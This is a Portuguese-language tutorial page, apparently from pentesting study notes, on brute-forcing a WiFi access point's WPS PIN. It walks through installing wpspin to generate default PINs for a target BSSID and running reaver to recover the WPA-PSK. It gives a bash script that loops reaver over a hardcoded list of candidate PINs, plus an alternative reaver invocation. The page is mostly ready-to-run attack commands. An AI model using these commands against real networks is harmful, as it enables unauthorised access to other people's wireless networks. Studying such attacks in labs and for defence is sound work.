LinkedinTryHackme

Using Multiple Pre-defined PINs

Embora seja possível aplicar força bruta ao PIN WPS usando Reaver, também podemos usar uma lista de palavras personalizada de PINs potenciais. Nesta seção, exploraremos como gerar PINs possíveis para uma rede WiFi usando wpspine, em seguida, criar um script bash personalizado para aplicar força bruta ao ponto de acesso com esses PINs.

Usando Python WPSPin para gerar PINs padrão

  • Para começar, podemos instalar a ferramenta a partir da fonte

git clone https://github.com/drygdryg/wpspin.git

  • Em seguida, navegamos até o diretório clonado da ferramenta e executamos o script de configuração para instalar o WPSPin.

cd wpspin
sudo python setup.py install

  • Uma vez instalado o WPSPin, podemos empregar o seguinte comando para gerar possíveis PINs padrão. Especificamos nosso BSSIDe -Apara gerar todos e quaisquer PINs possíveis.

wpspin -A 60:38:E0:A2:3D:2A

  • O WPSPin produz uma variedade de PINs possíveis para BSSIDs válidos. Para recuperar o WPA-PSK de um PIN conhecido, podemos usar o seguinte comando

sudo reaver --max-attempts=1 -l 100 -r 3:45 -i mon0 -b 60:38:E0:A2:3D:2A -c 1 -p 73834410

  • Podemos extrair apenas os pinos da saída do wpspin usando uma combinação dos comandos grepe :tr 

wpspin -A 60:38:E0:A2:3D:2A | grep -Eo '\b[0-9]{8}\b' | tr '\n' ' '

  • Este comando filtra e exibe os pins de 8 dígitos do arquivo de saída, separando-os com espaços. Agora podemos armazenar essa saída em uma variável de um script bash e usá-la para força bruta WPS, como mostrado abaixo.

#!/bin/bash

#We add generated PINs into this list
PINS='65771990 14582233 89418710 88764634 10275030 07941597 33271514 92586505 65185810 23237858 04447306 02000169 31543989 97315971 96154212 32382396 38011214 12345670 20172527 46264848 76229909 62327145 10864111 31957199 30432031 71412252 68175542 95661469 95719115 48563710 20854836 43977680 05294176 99956042 35611530 67958146 34259283 94229882 95755212'

for PIN in $PINS
do
    echo Attempting PIN: $PIN
    sudo reaver --max-attempts=1 -l 100 -r 3:45 -i mon0 -b C6:F2:8E:FC:F2:AF -c 1 -p $PIN
done
echo "PIN Guesses Complete"

  • Executar o script

chmod +x pinguess.sh
sudo bash pinguess.sh

  • Alternativa 

reaver -i mon0 -c 6 -b 00:23:69:48:33:95  -vv -L -N -d 15 -T .5 -r 3:15

Executando pesquisa de fornecedores

grep -i "60-38-E0" /var/lib/ieee-data/oui.txt

PreviousSecured Access PointsNextUsing PIN Generation Tools

Last updated